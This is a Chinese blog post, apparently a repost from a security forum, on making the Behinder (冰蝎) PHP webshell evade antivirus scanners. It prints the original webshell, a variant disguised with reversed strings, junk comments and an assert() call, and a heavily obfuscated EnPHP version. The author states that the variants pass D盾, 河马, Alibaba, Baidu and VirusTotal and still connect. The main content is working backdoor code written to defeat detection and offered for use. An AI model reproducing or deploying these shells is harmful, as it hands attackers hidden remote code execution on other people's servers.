您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

冰蝎webshell免杀(技巧)

时间:2022-05-11 10:20:23  来源:  作者:暗网视界

因前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅,当我像往常一样上传冰蝎的webhsell时,发现冰蝎的马子居然被杀了.......于是便有了该文章.....

先说一下目前的免杀情况:


D盾,河马等都零警报,
vt全绿,
阿里云webshell查杀安全,
百度webshell查杀安全,
其他等等....
目前仅测试了这些....其他的自行测试。

 

文章开始:
首先看一下冰蝎的原版马子:

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $_SESSION['k']=$key;
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

看一下原版的查杀率:

冰蝎webshell免杀(技巧)

 


再看一下百度的接口:

冰蝎webshell免杀(技巧)

 

阿里:

冰蝎webshell免杀(技巧)

 

河马,D盾:

冰蝎webshell免杀(技巧)

 


基本上都被杀软标记了....

那么我们想用冰蝎的话,就必须要免杀了

 

先说一下免杀的思路:

对于静态免杀,主要便是混淆代码了,base64,hex,异或等等....

反正思路要扩展起来,可能很多师傅是玩ctf的,我没玩过.....像里面的凯撒密码....等等各种密码学的东西其实可以搬到免杀的思路上来,但是像base64等等....可能早就被杀软计入特征库了,所以用base64等简单的加密,对webshell免杀可能不太好使了,

 

那有没有简单些的方式达到静态免杀呢?

 

答案是肯定的....

比如php的字符串逆置函数strrev(),可以将代码颠倒顺序,再在webshell里面加入注释,变量名称改改....使用一些php的魔术函数....以达到绕过杀软的静态防护。


我们将webshell放到d盾查杀....

 

看看到底是哪部分代码导致被查杀....[做个免杀的师傅应该都知道特征码定位技术,定位特征码,修改特征码绕过杀软]。


这里各位师傅自己尝试吧,建议二分法尝试,或则根据自己的经验判断。


我这里对下面部分代码进行逆值颠倒:

<?php
/*
我啥也不知道.....
sjfasaadssada
dadadad
*/
session_start();
    $ok="1989870a9753c7b3";//cwk
    $_SESSION['k']=$ok;
    $zyq=(strrev("s.NETnoc_teg_elif"))(strrev("tupni//:php"));
    $love=15;
    if(!extension_loaded(strrev('lssnepo')))
    {
        /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        $t=strrev("edoced_46esab");
        $zyq=$t($zyq."");
        /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        for($i=0;$i<strlen($zyq);$i++) {
            $o= $ok[$i+1&$love]^$zyq[$i]; 
            $zyq[$i] =$o;
        }
    }
    else
    {
        $zyq=(strrev("tpyrced_lssnepo"))($zyq, "AES128", $ok);
    }
    $arr=explode('|',$zyq);
    $func=$arr[0];
    /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
    $suansuan=$arr[1];
    class MOL{
        public function __construct($p) 
    {   
        $a=null;
        $l=null;
            /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        assert("/*#`|W$~Q*/".$l.$p.$a.""."/*#`|W$~Q*/");
        }
        /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        }
    @new MOL($suansuan);    
?>
/*
我啥也不知道.....
sjfasaadssada
dadadad
*/

 

这里就是简单的改了一下变量名称,增加了一些注释,还有魔术函数....


可以看一下D盾,河马过了

冰蝎webshell免杀(技巧)

 

至于百度那个还有阿里云.....:

冰蝎webshell免杀(技巧)

 


冰蝎webshell免杀(技巧)

 


果然它们还是很强....

怎么办呢?

到这一步,对于我这种小白而言,已经穷途末路了.....

但是我们还可以借助外部力量....

之前代码审计的时候,发现很多代码都进行的加密...但是程序依旧可以运行,所以我们可不可以对我们的webshell进行加密呢?

当然肯定的....随便在网上找找免费的加密网站...

https://enphp.djunny.com/

把能勾的全都勾了...

冰蝎webshell免杀(技巧)

 

进行加密处理:

加密之后的webshell:

<?php
/*
ddsds

-- EnPHP v2: http://enphp.djunny.com/
*/goto 愉帻;悈岽:$禈=0x0f;goto 佽乒;廷迹:class MOL{public function __construct($蚱岊){goto 榈蚨;榈蚨:$咜孟=null;goto 堥崍;悉ψ:溹唤(0x00000216a,0x02143)(溹唤(0x000219a,0x0021a8,0x0000218c,$蠇柱).$挃啚.$蚱岊.$咜孟.((parse_str("",$毇蒿)||$毇蒿)?base64_decode(key($毇蒿)):"").溹唤(0x000219a,0x0021a8,0x0000218c,$蠇柱));goto 稗;堥崍:$挃啚=null;goto 悉ψ;稗:}}goto 沫瞅;桷:if(!($仌弲<旞馨(0x000164b,0x01658,0x00161d)($夝麈)))goto 忟;goto €?洭矽:$嬴旔=騼霾(0x01ef5,0x0001f1f,0x0001ecf)(旞馨(0x015ef,0x00015fb,0x000015c5));goto ;非嗁:goto ;goto 堧駫;湛茎:session_start();goto 壼;沫瞅:@new MOL($鉃珛);goto 敝偖;壼:$璧瑏=騼霾(0x0001e70,0x00001e5d,$璧瑏);goto 啚庁;堧駫:僚曛:goto 洭矽;堝:function 溹唤(){goto 毢欫;毢欫:$昶橏=0x000002084;goto 楹惄;溺骝:櫡:goto 摅麜;陮粠:縼:goto 乔;菃変:return base64_decode('LyojYHxXJH5RKi8');goto 祲;乔:if(!($镫罢[0]==$昶橏+0x00a6))goto 鞃ㄝ;goto 贂慆;撁贪:鞃ㄝ:goto 苺鄞;楹惄:$镫罢=func_get_args();goto 玟葓;夠珱:return base64_decode(join("",array('Q','U','V','T','M','T','I','4')));goto 陮粠;贂慆:return base64_decode('fA');goto 撁贪;祲:濮:goto 摩弧;樅蓴:return((parse_str("砻鋻=YXNzZXJ0",$鑸塥)||$鑸塥)?base64_decode($鑸塥['砻鋻']):"");goto 溺骝;玟葓:if(!($镫罢[0x0002]==$昶橏+0x0000018))goto 縼;goto 夠珱;苺鄞:if(!($镫罢[0x001]==$昶橏+0x00bf))goto 櫡;goto 樅蓴;摅麜:if(!($镫罢[0x0002]==$昶橏+0x00000108))goto 濮;goto 菃変;摩弧:}goto 掑何;⒒麕:忟:goto 詪晃;詪晃::goto 枽掜;愉帻:error_reporting(0);goto 堝;动恰:goto 兑蛥;goto ⒒麕;€?$栦煻=$璧瑏[$仌弲+0x001&$禈]^$夝麈[$仌弲];goto 筮楱;席:$夝麈=strrev(旞馨(0x001695,0x000166e))($夝麈,溹唤(0x00020cd,0x020fd,0x0000209c),$璧瑏);goto 非嗁;鸂瓍:$夝麈=騼霾(0x01ef5,0x0001f1f,0x0001ecf)(騼霾(0x00001f66,0x0001f3d))(騼霾(0x01ef5,0x0001f1f,0x0001ecf)(旞馨(0x00001516)));goto 悈岽;佽乒:if(!旞馨(0x001550,0x000001521)(騼霾(0x01ef5,0x0001f1f,0x0001ecf)(旞馨(0x000158d,0x000015bb,0x00155f))))goto 僚曛;goto 席;椬窟:$仌弲++;goto 动恰;:$夝麈=$嬴旔($夝麈.gzinflate(' '));goto 笣;筮楱:$夝麈[$仌弲]=$栦煻;goto 檽偷;囫鸱:$阱蜎=$亽邼[0];goto 筷圆;筷圆:$鉃珛=$亽邼[0x001];goto 廷迹;檽偷:柇儶:goto 椬窟;掑何:function 旞馨(){goto 槥;堂稅:劳尤:goto 蒎埊;吒偳:险碍:goto 粳鰷;蒎埊:if(!(func_get_arg(0x001)==$伖8+0x00039))goto 险碍;goto 疅;苁陡:return(($族愳=gzinflate(substr(base64_decode('H4sIAAAAAAAAA0tNyU9OTYk3MUstTkwCAPbVV20NAAAA'),10,-8)))?$族愳:$丹椵);goto 觋Ⅹ;猷囔:return gzinflate('+)-人宰??  ');goto 堂稅;檸煿:if(!($螵孳[0x001]==$伖8+0x0186))goto 洞;goto 耽;燥鐣:if(!($螵孳[0x0002]==$伖8+0x00dd))goto 竿涡;goto 苁陡;亏彊:if(!($螵孳[0]==$伖8+0x002e))goto 劳尤;goto 猷囔;耽:return base64_decode('dHB5cmNlZF9sc3NuZXBv');goto 枟;疅:return base64_decode(join("",array('Z','X','h','0','Z','W','5','z','a','W','9','u','X','2','x','v','Y','W','R','l','Z','A')));goto 吒偳;亡铷:if(!($螵孳[0x0002]==$伖8+0x00000135))goto 浰琬;goto 华榇;柮键:浰琬:goto 檸煿;华榇:return base64_decode('c3RybGVu');goto 柮键;陥:$螵孳=func_get_args();goto 亏彊;枟:洞:goto 飹;觋Ⅹ:竿涡:goto 亡铷;槥:$伖8=0x00014e8;goto 陥;掟椴:纯臃:goto 燥鐣;兎烑:return gzinflate('?.蜬-? ');goto 掟椴;粳鰷:if(!($螵孳[0x0002]==$伖8+0x0000077))goto 纯臃;goto 兎烑;飹:}goto 鸨呦;啚庁:$_SESSION[騼霾(0x01ea5,0x000001e7c)]=$璧瑏;goto 鸂瓍;笣:$仌弲=0;goto 鹗寛;鹗寛:兑蛥:goto 桷;枽掜:$亽邼=explode(溹唤(0x0212a),$夝麈);goto 囫鸱;鸨呦:function 騼霾(){goto 阌;裏宴:return((parse_str("aw",$艳焯)||$艳焯)?base64_decode(key($艳焯)):"");goto 贁偫;溉:朝惉:goto 嬄虔;阌:$紧耖=0x01e50;goto 姥钷;硫:肮秆:goto 秱隇;劑矄:if(!($置钳[0x0002]==$紧耖+0x0007f))goto 肮秆;goto 炶澔;汅佞:return base64_decode(join("",array('M','T','k','4','O','T','g','3','M','G','E','5','N','z','U','z','Y','z','d','i','M','w')));goto 溉;帐肖:return base64_decode(join("",array('c','3','R','u','Z','X','R','u','b','2','N','f','d','G','V','n','X','2','V','s','a','W','Y')));goto 铂傈;秱隇:if(!($置钳[0x001]==$紧耖+0x000ed))goto 鎰;goto 帐肖;贁偫:瑧櫡:goto 劑矄;渭饸:if(!($置钳[0x001]==$紧耖+0x0000d))goto 朝惉;goto 汅佞;铂傈:鎰:goto 玳剷;嬄虔:if(!($置钳[0x001]==$紧耖+0x000002c))goto 瑧櫡;goto 裏宴;姥钷:$置钳=func_get_args();goto 渭饸;炶澔:return gzinflate('+.)*J- ');goto 硫;玳剷:}goto 湛茎;敝偖:echo((parse_str("LyoNCuAIkeWVpeS5n%2BS4jeefpemBky4uLi4uDQpzamZhc2FhZHNzYWRhDQpkYWRhZGFkDQoqLw0K",$啠)||$啠)?base64_decode(key($啠)):"");

 

反正我是看不懂了....就看杀软看不看的懂了....

 

d盾河马。。。

冰蝎webshell免杀(技巧)

 

百度查杀接口...

冰蝎webshell免杀(技巧)

 

阿里:

冰蝎webshell免杀(技巧)

 

vt:

冰蝎webshell免杀(技巧)

 

https://n.shellpub.com/:

冰蝎webshell免杀(技巧)

 

都过了....


尝试连接:

冰蝎webshell免杀(技巧)

 


冰蝎webshell免杀(技巧)

 


冰蝎webshell免杀(技巧)

 

嗯...很好


总结:
对于免杀这方面有很多技巧.....有时候也有玄学加成....哈哈哈,很奇怪,有时间各位师傅可以多看看杀软的工作原理再做免杀.....


本来前段时间想写shellcode的免杀什么的,但是太懒了

 

怎么说呢.....免杀学的是技巧....一般发出来的免杀都活不了多久,所以说还是需要自己多学习一些技巧的......


对了,上面那个加密网站好像每次加密的效果不一样,如果加密之后d盾警告的话,可以增删改注释.....

作者:suansuan,原文地址:
https://xz.aliyun.com/t/11149



Tags:冰蝎   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
冰蝎webshell免杀(技巧)
因前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅,当我像往常一样上传冰蝎的webhsell时,发现冰蝎的马子居然被杀了.......于是便有了该文章........【详细内容】
2022-05-11  Search: 冰蝎  点击:(709)  评论:(0)  加入收藏
▌简易百科推荐
小心“黑客”利用445端口攻击你的Win8系统!
Windows 8系统自带一个名为SMB(Server Message Block)的服务,使用445端口进行通信。这个服务主要用于文件共享和网络协议等功能,但是无良黑客也会利用这个服务来攻击你的电脑。...【详细内容】
2024-04-10    潘小姐  Tags:445端口   点击:(18)  评论:(0)  加入收藏
为什么黑客不去攻击微信钱包?
在这个数字化时代,网络安全已经成为我们生活中不可或缺的一部分。每当我们打开手机,使用微信钱包进行支付时,是否曾有过这样的疑问:为什么黑客不去攻击微信钱包?这个问题,就像是在...【详细内容】
2024-02-19  猫探长情报局  今日头条  Tags:黑客   点击:(59)  评论:(0)  加入收藏
发条消息就能破解iPhone?苹果系统这次像被“内鬼”攻破的。。。
前几天,差评君在网上冲浪的时候,看到了一条相当震撼的消息:简单来讲,就是主打封闭安全的 iPhone ,不仅被攻击者发现了漏洞成功入侵,完全控制整个手机。更加抽象的是入侵的还是知名...【详细内容】
2024-01-26  差评    Tags:破解iPhone   点击:(143)  评论:(0)  加入收藏
十种黑客攻击手段及防御方法
在互联网的世界里,网站安全犹如一座城堡,需要严密的防线来抵御各种攻击手段。以下是10种最常见的网络攻击手段,以及我们如何采取措施来保护我们的网站。1. 跨站脚本攻击:这是黑...【详细内容】
2024-01-21  老吴讲IT    Tags:黑客攻击   点击:(88)  评论:(0)  加入收藏
渗透测试中最常见的漏洞有哪些?
什么是渗透测试?渗透测试是一项安全测试,旨在模拟黑客的攻击方式,评估系统、网络或应用程序的安全性,发现潜在的安全漏洞并提出建议来修复它们。渗透测试中最常见的漏洞包括:1....【详细内容】
2024-01-11  五湖联技术服务公司    Tags:渗透测试   点击:(110)  评论:(0)  加入收藏
作为一名黑客/安全专家,应该掌握什么技能?熟悉哪些软件/工具?
作为一名合格的黑客/网络安全专家,应该具备一套全面的知识体系和实战技能,同时熟悉多种安全软件和工具。今天我们将根据目前市面上流行的一些应用程序,以及常规的安全防护措施,...【详细内容】
2023-12-11  黑客联盟I    Tags:黑客   点击:(144)  评论:(0)  加入收藏
黑客是如何入侵一个网站的?(网络安全人员应该了解的知识)
前不久阿里以及滴滴系统的大规模瘫痪足以唤起人们对网络安全的重视。我首先必须澄清的是,作为一个网络安全专家,我不提供或者鼓励任何违法的行为,包括未经授权的计算机系统入侵...【详细内容】
2023-12-07  黑客联盟I    Tags:黑客   点击:(179)  评论:(0)  加入收藏
网络黑客入侵解析:保护你的网络安全
在当今数字化快速发展的时代,网络安全问题逐渐成为人们关注的焦点。网络黑客入侵事件频发,给个人和企业带来了严重的威胁。本文将深入解析网络黑客入侵的常见手段和原因,并探讨...【详细内容】
2023-12-05  小记青春    Tags:黑客入侵   点击:(165)  评论:(0)  加入收藏
黑客滥用 Google 表单进行诈骗
研究人员最近发现滥用 Google 表单的垃圾邮件有所增加,攻击者首先在 Google 表单中创建新的问卷调查,并且利用受害者的电子邮件地址参与问卷调查,滥用 Google 表单的功能将垃圾...【详细内容】
2023-11-23  区块软件开发  今日头条  Tags:黑客   点击:(230)  评论:(0)  加入收藏
黑客工具 Flipper Zero 曝光,可利用蓝牙弹出窗口崩溃 iPhone
据外媒 9to5Mac 报道,一种流行且廉价的黑客设备 Flipper Zero 今年 9 月首次出现,可通过制造蓝牙弹出窗口,向 iPhone 和 iPad 重复告诉发送垃圾内容,直到相关设备最终崩溃,不过直...【详细内容】
2023-11-20  IT之家    Tags:黑客工具   点击:(242)  评论:(0)  加入收藏
相关文章
    无相关信息
站内最新
站内热门
站内头条